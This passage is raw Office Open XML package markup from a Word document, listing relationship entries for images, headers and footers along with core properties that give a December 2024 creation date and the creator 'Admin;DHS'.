Target="media/image7.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId18"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4YGHgP/GzLCnw3P6hQKwVknueQ==">CgMxLjAyCWguMzBqMHpsbDIIaC5namRneHM4AHIhMUZscFlfYUNIcVZPbnZEUmlTdzFYejNzRl9BcWRMMG9r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2024-12-30T04:48:00Z</dcterms:created>
  <dc:creator>Admin;DHS</dc:creator>
</cp:coreProperties>
</file>